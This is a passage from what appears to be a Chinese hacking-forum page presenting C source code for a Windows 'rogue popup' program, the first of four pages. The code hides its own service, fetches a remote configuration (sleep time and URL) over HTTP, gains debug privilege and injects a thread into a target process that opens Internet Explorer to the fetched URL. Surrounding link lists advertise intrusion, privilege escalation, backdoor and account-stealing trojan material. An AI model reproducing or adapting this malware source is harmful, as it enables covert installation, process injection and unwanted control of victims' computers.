·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]一个弹窗口的流氓软件源码

荐 ★★★★★

一个弹窗口的流氓软件源码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-19 10:24:32

/**************************************************************************************************
* 服务入口
**************************************************************************************************/
void ServiceMain( DWORD argc, char *argv[] )
{
serviceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwServiceSpecificExitCode = 0;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

#ifdef DEBUG
LogToFile( L”ServiceMain: Try to register service\n” );
#endif

hServiceStatus = RegisterServiceCtrlHandler( SERVICE_NAME, (LPHANDLER_FUNCTION)ServiceControl );
if( hServiceStatus == (SERVICE_STATUS_HANDLE)0 )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”ServiceMain: Register service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

return;
}

serviceStatus.dwCurrentState = SERVICE_RUNNING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
swprintf( tmp, L”ServiceMain: Start service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

return;
}

#ifdef DEBUG
LogToFile( L”ServiceMain: Start service ok\n” );
#endif

// 隐藏服务
HideService( SERVICE_NAME );

// 从网络读取配置
GetConfig( );

// 注入代码
InjectCode( );

serviceStatus.dwCurrentState = SERVICE_STOPPED;
if( !SetServiceStatus( hServiceStatus, &serviceStatus) )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”ServiceMain: Stop service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif
}

#ifdef DEBUG
LogToFile( L”Stop service in main.\n” );
#endif

#ifdef DEBUG
LogToFile( L”ServiceMain Done.\n” );
#endif

return;
}

void InjectCode( )
{
if( ! SetDebugPrivilege() )
{
#ifdef DEBUG
LogToFile( L”Set Debug Privileges error.\n” );
#endif

return;
}

DWORD dwPID = -1;
while( 1 )
{
dwPID = GetProcessIdByName( TARGET_PROCESS );

if( -1 != dwPID )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”Target process id is %d\n”, dwPID );
LogToFile( tmp );
#endif

break;
}

#ifdef DEBUG
LogToFile( L”Target process not found, sleep and continue.\n” );
#endif

Sleep( 30 * 1000 );
}

Sleep( 2 * 60 * 1000 );

// 打开进程
HANDLE hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPID );
if( ! hProcess )
{
#ifdef DEBUG
LogToFile( L”OpenProcess error.\n” );
#endif

return;
}

//计算LoadLibraryA和GetProcAddress的入口地址，这两个函数由kernel32.dll导出，在各进程中不变
Arguments arguments;

memset( (void *)&arguments, 0, sizeof(Arguments) );
HMODULE hKernel = GetModuleHandleA( “kernel32″ );
if( hKernel == NULL )
{
#ifdef DEBUG
LogToFile( L”GetModuleHandle kernel32.dll error.\n” );
#endif

return;
}
arguments.MyLoadLibrary = GetProcAddress( hKernel, “LoadLibraryA” );
arguments.MyGetAddress = GetProcAddress( hKernel, “GetProcAddress” );

strcpy( arguments.MyKernelDll, “kernel32.dll” );
strcpy( arguments.MyProgram, IE_PATH );
strcpy( arguments.MyShellDll, “Shell32.dll” );
strcpy( arguments.MyShellExecute, “ShellExecuteA” );
strcpy( arguments.MyUrl, url_path );
strcpy( arguments.MyZeroMemory, “RtlZeroMemory” );
arguments.SleepTime = sleep_time;

// 在远程进程中分配内存存放参数，可写权限
Arguments *remote_agrument = (Arguments *)VirtualAllocEx( hProcess,
0,
sizeof(Arguments),
MEM_COMMIT,
PAGE_READWRITE );
if( !remote_agrument )
{
#ifdef DEBUG
LogToFile( L”VirtualAllocEx for arguments error.\n” );
#endif

return;
}

#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”Remote Arguments’ addr: 0x%08x\n”, (DWORD)remote_agrument );
LogToFile( tmp );
#endif

// 将参数写入远程进程内存
int bytes_write;
if( !WriteProcessMemory( hProcess, (LPVOID)remote_agrument, (LPVOID)&arguments, sizeof(Arguments), (SIZE_T *)&bytes_write) )
{
#ifdef DEBUG
LogToFile( L”WriteProcessMemory for arguments error.\n” );
#endif
return;
}

// 在远程进程中分配内存存放代码，可执行权限
LPVOID remote_func = VirtualAllocEx( hProcess,
0,
REMOTE_FUNC_LENGTH,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE );
if( !remote_func )
{
#ifdef DEBUG
LogToFile( L”VirtualAllocEx for function error.\n” );
#endif

return;
}

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Remote Function Address: 0x%08x\n”, remote_func );
LogToFile( tmp );
#endif

// 将代码写入远程进程内存
if( !WriteProcessMemory( hProcess, (LPVOID)remote_func, (LPVOID)&CustomFunction, REMOTE_FUNC_LENGTH, (SIZE_T *)&bytes_write) )
{
#ifdef DEBUG
LogToFile( L”WriteProcessMemory for function error.\n” );
#endif

return;
}

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”WriteProcessMemory for function %d bytes\n”, bytes_write );
LogToFile( tmp );
#endif

HANDLE remote_thread = CreateRemoteThread( hProcess, 0, 0, (LPTHREAD_START_ROUTINE)remote_func, remote_agrument, 0, 0 );
if ( !remote_thread )
{
#ifdef DEBUG
LogToFile( L”CreateRemoteThread for function error.\n” );
#endif

return;
}

#ifdef DEBUG
LogToFile( L”CreateRemoteThread for function ok\n” );
#endif

/*
WaitForSingleObject( remote_thread, INFINITE );

if( NULL != remote_func )
{
VirtualFreeEx( hProcess, remote_func, REMOTE_FUNC_LENGTH, MEM_RELEASE );
#ifdef DEBUG
LogToFile( L”VirtualFreeEx for remote_func.\n” );
#endif
}
if( NULL != remote_agrument )
{
VirtualFreeEx( hProcess, remote_agrument, sizeof (Arguments), MEM_RELEASE);

#ifdef DEBUG
LogToFile( L”VirtualFreeEx for remote_agrument.\n” );
#endif
}

if( NULL != remote_thread )
{
CloseHandle( remote_thread );

#ifdef DEBUG
LogToFile( L”CloseHandle for remote_thread.\n” );
#endif
}
if( NULL != hProcess )
{
CloseHandle( hProcess );

#ifdef DEBUG
LogToFile( L”CloseHandle for hProcess.\n” );
#endif
}
*/

return;
}

void GetConfig( )
{
#ifdef DEBUG
WCHAR tmp[256] = { 0 };
#endif

WSAData wsa;
struct sockaddr_in sin;

memset( &sin, 0, sizeof(struct sockaddr_in) );
if( WSAStartup( 0×0202, &wsa ) != 0 )
{
#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”WSAStartup error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

goto getconfig_error;
}

struct hostent *phost = gethostbyname( CONFIG_HOST );
if( phost == NULL )
{
#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Resolv config host name error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

WSACleanup( );
goto getconfig_error;
}

memcpy( &sin.sin_addr , phost->h_addr_list[0] , phost->h_length );
sin.sin_family = AF_INET;
sin.sin_port = htons( 80 );

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );

WCHAR ip[256] = { 0 };
MULTI_TO_WIDE( ip, inet_ntoa( sin.sin_addr ));

wsprintf( tmp, L”Resolv config host name ok: %s\n”,ip );
LogToFile( tmp );
#endif

SOCKET sock = socket( AF_INET , SOCK_STREAM , 0 );
if( sock == INVALID_SOCKET )
{
#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Connect to %s:%s error: \n”, ip, 80, GetLastError() );
LogToFile( tmp );
#endif

WSACleanup( );
goto getconfig_error;
}

int ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( SOCKET_ERROR == ret )
{
#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Connect error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

closesocket( sock );
WSACleanup( );
goto getconfig_error;
}

char send_buff[512] = { 0 };
sprintf( send_buff, “GET %s HTTP/1.1\r\nHost: %s\r\nAccept: */*\r\n\r\n”, CONFIG_PATH, CONFIG_HOST );

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );

WCHAR tmp2[256] = { 0 };
MULTI_TO_WIDE( tmp2, send_buff );
wsprintf( tmp, L”Send request to get config:\n %s\n”, tmp2 );
LogToFile( tmp );

#endif

ret = send( sock, send_buff, strlen(send_buff), 0 );
if( SOCKET_ERROR == ret )
{
#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Send request error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

closesocket( sock );
WSACleanup( );
goto getconfig_error;
}

#ifdef DEBUG
LogToFile( L”Send request ok!\n” );
#endif

char recv_buff[1024] = { 0 };
recv( sock, recv_buff, 1000, 0 );
if( !recv_buff )
{
closesocket( sock );
WSACleanup( );
goto getconfig_error;
}

closesocket( sock );
WSACleanup( );

char *content = strstr( recv_buff, “\r\n\r\n” );
if( !content )
{
goto getconfig_error;
}

content += strlen(”\r\n\r\n”);

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );

WCHAR c[256] = { 0 };
MULTI_TO_WIDE( c, content );

wsprintf( tmp, L”Config content is:\n%s\n”, c );
LogToFile( tmp );
#endif

char *split_flag = strstr( content, “|” );
if( !split_flag )
{
goto getconfig_error;
}

char tmp_time[32] = { 0 };
char tmp_url[512] = { 0 };
if( split_flag - content > 32 )
{
sleep_time = DEFAULT_SLEEP_TIME;
}
else
{
strncpy( tmp_time, content, split_flag - content );
sleep_time = atoi( tmp_time );
}

if( strlen( split_flag ) >= 512 )
{
strcpy( url_path, DEFAULT_URL );
}
else
{
strcpy( url_path, split_flag + 1 );
}

return;

getconfig_error:

sleep_time = DEFAULT_SLEEP_TIME;
strcpy( url_path, DEFAULT_URL );

return;
}

上一页 [1] [2] [3] [4] 下一页

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： C++ win32 下载者源码

下一篇文章： NBSI_1.157源代码

【字体：小大】

中介交易区

网游盗号木马实现手记	01-09
黑色技术蠕虫下载者[完整源码]	11-01
利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02